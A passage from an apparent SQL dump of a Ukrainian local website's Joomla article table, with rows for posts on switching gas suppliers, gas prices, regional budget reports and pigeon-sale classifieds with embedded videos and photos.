00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,7,'','',1,57,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2501,2924,'«Газова грамота»: як змінити постачальника газу і скільки часу це займає?','gazova-gramota-yak-zminiti-postachalnika-gazu-i-skilki-chasu-tse-zajmae','<!--StartFragment--><p>Із відкриттям ринку газу українці отримали можливість змінити постачальника «блакитного палива» легко і швидко. Це можна зробити навіть онлайн.</p><p>Достатньо лише обрати нову компанію й подати до неї заяву та мінімальний пакет документів.</p><p>Усіма бюрократичними процесами опікуватиметься постачальник газу, з яким споживач хоче укласти договір.</p><p>Процес зміни постачальника газу може займати близько трьох тижнів. Але зазвичай перехід відбувається набагато швидше.</p><p>У нашому ролику ви знайдете покрокову інструкцію, як змінити постачальника газу легко і без зайвого клопоту.</p><p><a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/https://gazpravda.com.ua/</a><br></p><p><br></p><!--EndFragment--><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/s5xvBHiBLlg\" width=\"560\"></iframe></span></p>','',1,8,'2021-02-12 14:00:39',430,'','2021-02-12 14:01:47',430,0,'0000-00-00 00:00:00','2021-02-12 14:00:39','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,20,'','',1,72,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2502,2925,'Кращі виступи дітей в Голос Діти ','krashchi-vistupi-ditej-v-golos-diti','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/SEoWuQ7uqVI\" width=\"560\"></iframe></span></p>','',1,8,'2021-02-20 17:01:50',430,'','2021-02-20 17:01:50',0,0,'0000-00-00 00:00:00','2021-02-20 17:01:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,19,'','',1,52,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2503,2926,'Підростають молоді поштові - годую вручну, вже 3 березня 2021 року ','pidrostayut-molodi-poshtovi-goduyu-vruchnu-vzhe-3-bereznya-2021-roku','	<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/IVisotsY5Xw\" width=\"560\"></iframe></span></p>','',1,126,'2021-03-05 16:47:13',430,'','2021-03-05 16:47:27',430,0,'0000-00-00 00:00:00','2021-03-05 16:47:13','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,6,'','',1,65,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2504,2927,'Починається масове будівництво гнізд ','pochinaetsya-masove-budivnitstvo-gnizd','	<p><img src=\"https://malehus.in.ua/images/stories/IMG_20210305_103303.jpg\" alt=\"\" class=\"fr-fil fr-dib\" width=\"747\"></p><p><img src=\"https://malehus.in.ua/images/stories/IMG_20210305_093837.jpg\" alt=\"\" class=\"fr-fil fr-dib\" width=\"742\"><br></p>','',1,136,'2021-03-05 17:01:10',430,'','2021-03-05 17:01:19',430,0,'0000-00-00 00:00:00','2021-03-05 17:01:10','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,'','',1,77,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2505,2928,'Із святом весни, краси та любові!','iz-svyatom-vesni-krasi-ta-lyubovi','<p><img src=\"https://malehus.in.ua/images/stories/0_0_01.jpg\" alt=\"\" class=\"fr-fin\" width=\"749\"></p>','',1,8,'2021-03-05 17:48:04',430,'','2021-03-05 17:48:04',0,0,'0000-00-00 00:00:00','2021-03-05 17:48:04','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,18,'','',1,27,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2506,2929,'Поштові голуби, пройшло ще 10 днів- 14 березня і перший пробний політ..','poshtovi-golubi-projshlo-shche-10-dniv','	<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/VigWsKc8CLE\" width=\"560\"></iframe></span></p>','',1,126,'2021-03-14 06:40:07',430,'','2021-03-14 06:49:30',430,0,'0000-00-00 00:00:00','2021-03-14 06:40:07','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,5,'','',1,117,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2507,2930,'Перші поштові 2021 року- експеримент вийшов на фінішну пряму- 21 березня 2021 року перший самостійний сніданок.','pershi-poshtovi-2021-roku-eksperiment-vijshov-na-finishnu-pryamu-21-bereznya-2021-roku-pershij-samostijnij-snidanok','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/00zORoTUw_4\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,126,'2021-03-21 08:23:44',430,'','2021-03-21 08:23:44',0,0,'0000-00-00 00:00:00','2021-03-21 08:23:44','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,4,'','',1,83,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2508,2931,'Результати за 3 місяці 2021 року','vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2-misyatsi-2021-roku','	<p><span style=\"color: #28324E; font-family: Georgia; font-size: 15px;\">За даними Департаменту фінансів Житмирської ОДА</span>.<img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/censor.jpg\"></p>','',1,8,'2021-03-21 08:49:35',430,'','2021-04-17 14:14:29',430,0,'0000-00-00 00:00:00','2021-03-21 08:49:35','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,17,'','',1,152,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2517,2940,'Голуб кінг','golub-king','<p style=\"text-align: left;\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/IMG_20210418_172952_tigr.jpg\" width=\"417\"><strong>Пропоную коричневого самця 2019 року або обмін на самку.<br>Є можливість передати маршрутками в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч.<br>Дзвоніть - домовимось, тел/viber:&nbsp; 0508320922</strong><img alt=\"\" class=\"fr-image-dropped fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/IMG_20210418_172612.jpg\" width=\"422\"><!--EndFragment--></p>','',1,127,'2021-04-18 15:43:14',430,'','2021-04-18 15:48:33',430,0,'0000-00-00 00:00:00','2021-04-18 15:43:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,2,'','',1,173,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2518,2941,'Кінг самочка осіння','king-samochka-osinnya','<!--StartFragment--><p style=\"text-align: left;\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/IMG_20210418_17328788709_tigr.jpg\" width=\"750\"></p><p>Пропоную самочку кінга осінню. Є можливість передати маршрутками в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч.</p><p> Дзвоніть домовимось. 0508320922</p><!--EndFragment-->','',1,127,'2021-04-18 15:55:39',430,'','2021-04-18 16:02:40',430,0,'0000-00-00 00:00:00','2021-04-18 15:55:39','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,1,'','',1,158,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2519,2942,'Річна фіксована ціна на газ уже виправдовує себе','richna-fiksovana-tsina-na-gaz-uzhe-vipravdovue-sebe','<p><img src=\"https://malehus.in.ua/images/stories/0053333.gif\" alt=\"\" class=\"fr-dii fr-fin\">Попри завершення опалювального  сезону газ у Європі лише дорожчає. На таку незвичну для літа тенденцію  впливають пожвавлення економіки, низькі запаси палива в сховищах, а також  російський Газпром, який штучно створює дефіцит газу на європейському ринку, обмежуючи  обсяги постачання.</p><p><strong>У середньому ціни на газ у  Європі на початок червня сягали 25,9  євро/МВт-год, що трохи більше за $270 за тисячу кубометрів.</strong></p><p>Таким чином, ринкова ціна за  кубометр газу в червні сягає майже 12 грн за кубометр.</p><p>Проте ціну в майже 12 грн за  кубометр споживачі не платитимуть! Адже як базова діє річна, фіксована ціна. У  Нафтогазу вона складає 7,96 грн за кубометр. Річні ціни решти компаній  коливаються від 7,80 грн до 13,50 грн за кубометр. Перелік усіх пропозицій  можна переглянути в огляді ГазПравди: <a href=\"https://gazpravda.com.ua/novyny/vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizhi-tsinnyky-na-haz.\">https://gazpravda.com.ua/novyny/vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizhi-tsinnyky-na-haz.</a></p><p>Базова річна ціна зафіксована  на рік і не змінюється навіть за умов підвищення цін на європейських хабах і  сезонних коливань.</p><p>Підключення ж до тарифного  плану «Місячний» відбувається <strong>ЛИШЕ</strong> за бажанням клієнта. У даному випадку  споживачам справді вигідно залишатися на річних базових пропозиціях.</p><p>Але вже в липні більшість  компаній обіцяють презентувати свої сезонні та альтернативні річні продукти –  наприклад, із рівними помісячними проплатами. ГазПравда вже чекає на різні,  конкурентні пропозиції та підготує спеціальний огляд сезонних цін, аби  споживачі могли обрати для себе найкращий варіант.</p><p><a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a><br></p>','',1,8,'2021-06-17 18:42:16',430,'','2021-06-17 18:42:16',0,0,'0000-00-00 00:00:00','2021-06-17 18:42:16','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,16,'','',1,59,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2520,2943,'Виконання дохідної частини бюджетів ОТГ Житомирської області за 5 місяців 2021 року','vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-5-misyatsiv-2021-roku','<p>За даними Департаменту фінансів Житомирської ОДА.<img src=\"https://malehus.in.ua/images/stories/censor.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','',1,8,'2021-06-17 18:48:47',430,'','2021-06-17 18:48:47',0,0,'0000-00-00 00:00:00','2021-06-17 18:48:47','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,15,'','',1,50,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2521,2944,'Молоді поштові готові поміняти прописку','molodi-poshtovi-gotovi-pominyati-propisku','<!--StartFragment--><p><strong>В наявності є птиця 21 року так і минулих років. Локація - м.Малин, Житомирської області.</strong></p><p><strong>Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмільник. Ціна 100, телефонуйте 0508320922, домовимось.</strong></p><p><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140144_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\">&nbsp;<img src=\"https://malehus.in.ua/images/stories/gol_20210615_140145_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\">&nbsp;<img src=\"https://malehus.in.ua/images/stories/gol_20210615_140146_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"><strong><br></strong></p><p><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140148_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\">&nbsp;<img src=\"https://malehus.in.ua/images/stories/gol_20210615_140149_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p><p><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140143_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\">&nbsp;<img src=\"https://malehus.in.ua/images/stories/gol_20210615_140150_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p><!--EndFragment-->','',1,126,'2021-06-17 19:15:25',430,'','2021-06-17 19:15:25',0,0,'0000-00-00 00:00:00','2021-06-17 19:15:25','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_